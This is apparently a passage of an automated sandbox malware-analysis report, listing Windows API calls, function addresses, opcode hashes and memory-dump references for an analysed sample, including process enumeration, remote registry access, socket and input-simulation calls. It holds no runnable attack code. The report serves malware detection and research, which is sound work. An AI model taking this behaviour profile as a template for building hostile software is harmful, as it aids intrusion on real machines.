                                                        • Instruction Fuzzy Hash: CEB15779900249DFDB10CFA8C5917EEBBB1FF08304F24A929EC59EB250DB30A955CB65
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00EA1C18
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00EA1C26
                                                        • __wsplitpath.LIBCMT ref: 00EA1C54
                                                          • Part of subcall function 00E61DFC: __wsplitpath_helper.LIBCMT ref: 00E61E3C
                                                        • _wcscat.LIBCMT ref: 00EA1C69
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00EA1CDF
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00EA1CF1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 1380811348-0
                                                        • Opcode ID: d439d03dd9b1a0e3972b7086dd170f7d1f309b66c85ba041c0c4f6b374c85183
                                                        • Instruction ID: 6c343bf0e91ee302cbdddb972e4cc0ce6db2b58d19d4474aebea7d3c3f05316b
                                                        • Opcode Fuzzy Hash: d439d03dd9b1a0e3972b7086dd170f7d1f309b66c85ba041c0c4f6b374c85183
                                                        • Instruction Fuzzy Hash: A9517E711083009FD720EF24DC85EABB7ECEF88754F04596EF985A7251EB30A905CB92
                                                        APIs
                                                          • Part of subcall function 00EA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA2BB5,?,?), ref: 00EA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA30AF
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA30EF
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EA3112
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EA313B
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EA317E
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EA318B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                        • String ID:
                                                        • API String ID: 3451389628-0
                                                        • Opcode ID: 9e9d4bdc2ee3b87ad56ee3077463a3dabff9b990abe33adbb5857d8da14a00e6
                                                        • Instruction ID: 35829dade984c3d557d1864fabea4330a83da30c662034be484f12cf0561d451
                                                        • Opcode Fuzzy Hash: 9e9d4bdc2ee3b87ad56ee3077463a3dabff9b990abe33adbb5857d8da14a00e6
                                                        • Instruction Fuzzy Hash: 97514B31208300AFC714EF64CC96E6AB7E9FF89304F04592DF555AB2A1DB71EA05CB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00EA8540
                                                        • GetMenuItemCount.USER32(00000000), ref: 00EA8577
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EA859F
                                                        • GetMenuItemID.USER32(?,?), ref: 00EA860E
                                                        • GetSubMenu.USER32(?,?), ref: 00EA861C
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EA866D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: bed6ed2e87f51dcb1e6e8013fa63883feb9100bcd3f9da874eb771d818575dfc
                                                        • Instruction ID: 9ebe30889997cb32981f49be5b640e20f7a39cbd6a8b3a85d9e237bdffd2f395
                                                        • Opcode Fuzzy Hash: bed6ed2e87f51dcb1e6e8013fa63883feb9100bcd3f9da874eb771d818575dfc
                                                        • Instruction Fuzzy Hash: 30519B31E00214AFDB11EFA4CA41AAEB7F5FF89310F1054A9E916BB351CB31BE418B90
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E84B10
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E84B5B
                                                        • IsMenu.USER32(00000000), ref: 00E84B7B
                                                        • CreatePopupMenu.USER32 ref: 00E84BAF
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00E84C0D
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E84C3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 8e11bd867edf3757aac342cf2e0b491d6557a5b5b20d93251f1e83a63dc4ed8f
                                                        • Instruction ID: 7b6fef41e16bcd6c9854a82f6a4e8274ffd5a91959fbff6bc0bf98b3b14c8954
                                                        • Opcode Fuzzy Hash: 8e11bd867edf3757aac342cf2e0b491d6557a5b5b20d93251f1e83a63dc4ed8f
                                                        • Instruction Fuzzy Hash: 3B519EB060120AEFEF20EFA4D888BADBBF8EF44318F145169E41DBA2D1D7719945CB51
                                                        APIs
                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00EDDC00), ref: 00E98E7C
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98E89
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00E98EAD
                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00E98EC5
                                                        • _strlen.LIBCMT ref: 00E98EF7
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98F6A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_strlenselect
                                                        • String ID:
                                                        • API String ID: 2217125717-0
                                                        • Opcode ID: 571bad522ce4f9a34524b0f06d91531ded4460d1583d12981761310063bba271
                                                        • Instruction ID: 1688a6f0d45097dbfbb5e25741a6459c2aae0df309fcbe401f589e667efb4fd1
                                                        • Opcode Fuzzy Hash: 571bad522ce4f9a34524b0f06d91531ded4460d1583d12981761310063bba271
                                                        • Instruction Fuzzy Hash: 6641E771600108AFCB14EB64DD95EADB7F9EF45314F10656AF51AB72A1DF309E04CB50
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • BeginPaint.USER32(?,?,?), ref: 00E5AC2A
                                                        • GetWindowRect.USER32(?,?), ref: 00E5AC8E
                                                        • ScreenToClient.USER32(?,?), ref: 00E5ACAB
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E5ACBC
                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00E5AD06
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00EBE673
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                        • String ID:
                                                        • API String ID: 2592858361-0
                                                        • Opcode ID: 09f2bef18fd94a25ed8a46ffdfef64f4b8914962384a906ee91bba2368fc9722
                                                        • Instruction ID: 8748832db7b686fe70497f6eddc75bb2820f2b634afe1531770a9e6ac9373121
                                                        • Opcode Fuzzy Hash: 09f2bef18fd94a25ed8a46ffdfef64f4b8914962384a906ee91bba2368fc9722
                                                        • Instruction Fuzzy Hash: 98419D701042049FC710DF24CC84FA77BF8BB59325F080B79F9A5A72A1C732A849EB62
                                                        APIs
                                                        • ShowWindow.USER32(00F01628,00000000,00F01628,00000000,00000000,00F01628,?,00EBDC5D,00000000,?,00000000,00000000,00000000,?,00EBDAD1,00000004), ref: 00EAE40B
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00EAE42F
                                                        • ShowWindow.USER32(00F01628,00000000), ref: 00EAE48F
                                                        • ShowWindow.USER32(00000000,00000004), ref: 00EAE4A1
                                                        • EnableWindow.USER32(00000000,00000001), ref: 00EAE4C5
                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EAE4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 2e26f9fd37333a46e6b5cab5bd402fb24038c174a880fba4d461fbacf47908bf
                                                        • Instruction ID: c91fbed8a0c4f19cf60e20e7db4c68a3bf9fef7dd5817b762c34b22c65a1b498
                                                        • Opcode Fuzzy Hash: 2e26f9fd37333a46e6b5cab5bd402fb24038c174a880fba4d461fbacf47908bf
                                                        • Instruction Fuzzy Hash: 1D414034605141EFDB21CF24C499F947BE5BF4E308F1851B9EA69AF2A2C732B846CB51
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E898D1
                                                          • Part of subcall function 00E5F4EA: std::exception::exception.LIBCMT ref: 00E5F51E
                                                          • Part of subcall function 00E5F4EA: __CxxThrowException@8.LIBCMT ref: 00E5F533
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E89908
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E89924
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E8999E
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E899B3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E899D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 2537439066-0
                                                        • Opcode ID: be40c30cd9d90cbecd9842a3b7871b7d01179c537d3608a68ea0af2474dd5c3d
                                                        • Instruction ID: e78cdb1eb96a258ce11302933bd4a97cf6af8edcc6a4c5fb8a5353f1ba5a02c2
                                                        • Opcode Fuzzy Hash: be40c30cd9d90cbecd9842a3b7871b7d01179c537d3608a68ea0af2474dd5c3d
                                                        • Instruction Fuzzy Hash: ED316131900105AFDB10AF95DC85EAEB7B8FF84311B1480B9F908BB256E775DE19DBA0
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00E977F4,?,?,00000000,00000001), ref: 00E99B53
                                                          • Part of subcall function 00E96544: GetWindowRect.USER32(?,?), ref: 00E96557
                                                        • GetDesktopWindow.USER32 ref: 00E99B7D
                                                        • GetWindowRect.USER32(00000000), ref: 00E99B84
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E99BB6
                                                          • Part of subcall function 00E87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E87AD0
                                                        • GetCursorPos.USER32(?), ref: 00E99BE2
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E99C44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: dc0bd919b968a68898de1803d31c0b5064d7186aeddbd9c29b8bd8e572e3cc0e
                                                        • Instruction ID: f58c6f2432cc8d1bb44b539198fa0c505fc71e20c6e69ecdc7b7027b7e169040
                                                        • Opcode Fuzzy Hash: dc0bd919b968a68898de1803d31c0b5064d7186aeddbd9c29b8bd8e572e3cc0e
                                                        • Instruction Fuzzy Hash: 1A31C172108315AFCB10DF58DC49F9AB7E9FF88314F00092AF599E7182E632E909CB91
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E7AFAE
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E7AFB5
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E7AFC4
                                                        • CloseHandle.KERNEL32(00000004), ref: 00E7AFCF
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7AFFE
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E7B012
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 072ef3955e6c20e5694b73c3484fb2635f3ed95675172ef61c0a3106cafde6f0
                                                        • Instruction ID: 3786896f8caa826ec840b10023081cec818477d364822d3a6a8101023341e88b
                                                        • Opcode Fuzzy Hash: 072ef3955e6c20e5694b73c3484fb2635f3ed95675172ef61c0a3106cafde6f0
                                                        • Instruction Fuzzy Hash: 1A213A72105209AFDB128F99DD09FEE7BA9AB84308F089035FA05B2161C2769D25EB61
                                                        APIs
                                                          • Part of subcall function 00E5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E5AFE3
                                                          • Part of subcall function 00E5AF83: SelectObject.GDI32(?,00000000), ref: 00E5AFF2
                                                          • Part of subcall function 00E5AF83: BeginPath.GDI32(?), ref: 00E5B009
                                                          • Part of subcall function 00E5AF83: SelectObject.GDI32(?,00000000), ref: 00E5B033
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EAEC20
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00EAEC34
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAEC42
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00EAEC52
                                                        • EndPath.GDI32(00000000), ref: 00EAEC62
                                                        • StrokePath.GDI32(00000000), ref: 00EAEC72
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: ec3342899b4172d78f1a114c4f3e2d4ab94546769dba86fc04ec527862e3e2a3
                                                        • Instruction ID: e58b0955defbb1d70c37394853c4e321ceae219ed32e7e3fe59850c412851cd8
                                                        • Opcode Fuzzy Hash: ec3342899b4172d78f1a114c4f3e2d4ab94546769dba86fc04ec527862e3e2a3
                                                        • Instruction Fuzzy Hash: 9B111E7200414DBFDF029F94DC89EDA7F6DEB08354F048126BE0859160D7729D5ADBA0
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00E7E1C0
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E7E1D1
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7E1D8
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00E7E1E0
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E7E1F7
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00E7E209
                                                          • Part of subcall function 00E79AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00E79A05,00000000,00000000,?,00E79DDB), ref: 00E7A53A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                        • String ID:
                                                        • API String ID: 603618608-0
                                                        • Opcode ID: 6418729a2fab4a45662cacb8480d1886d74a6a2a584bef9dc06b355c7a50b0f5
                                                        • Instruction ID: 035fdf7f61af5d7c14b13c829d7998e9ea5d525282c29c61550e119b1dc57dfd
                                                        • Opcode Fuzzy Hash: 6418729a2fab4a45662cacb8480d1886d74a6a2a584bef9dc06b355c7a50b0f5
                                                        • Instruction Fuzzy Hash: AF0184B5A00214BFEB109BA68C46F5EBFB9EB48355F008076EA08B7390D6729C01CB60
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 00E67B47
                                                          • Part of subcall function 00E6123A: __initp_misc_winsig.LIBCMT ref: 00E6125E
                                                          • Part of subcall function 00E6123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E67F51
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E67F65
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E67F78
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E67F8B
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E67F9E
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E67FB1
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E67FC4
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E67FD7
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E67FEA
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E67FFD
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E68010
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E68023
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E68036
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E68049
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E6805C
                                                          • Part of subcall function 00E6123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E6806F
                                                        • __mtinitlocks.LIBCMT ref: 00E67B4C
                                                          • Part of subcall function 00E67E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00EFAC68,00000FA0,?,?,00E67B51,00E65E77,00EF6C70,00000014), ref: 00E67E41
                                                        • __mtterm.LIBCMT ref: 00E67B55
                                                          • Part of subcall function 00E67BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E67B5A,00E65E77,00EF6C70,00000014), ref: 00E67D3F
                                                          • Part of subcall function 00E67BBD: _free.LIBCMT ref: 00E67D46
                                                          • Part of subcall function 00E67BBD: DeleteCriticalSection.KERNEL32(00EFAC68,?,?,00E67B5A,00E65E77,00EF6C70,00000014), ref: 00E67D68
                                                        • __calloc_crt.LIBCMT ref: 00E67B7A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E67BA3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 2942034483-0
                                                        • Opcode ID: 194ead9374fae198275108c35d74c4e6c7493048f8c8907bdeb541dee3adaf52
                                                        • Instruction ID: d42ae5f9245f56b2ec807d17af71fdd9bf0e897dba17425ec355e8379396063a
                                                        • Opcode Fuzzy Hash: 194ead9374fae198275108c35d74c4e6c7493048f8c8907bdeb541dee3adaf52
                                                        • Instruction Fuzzy Hash: 5AF096321ED7111DE6297B757C06A5A2BD59F017FCB3426ADF8E4F50E2FF2188418160
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E4281D
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E42825
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E42830
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E4283B
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E42843
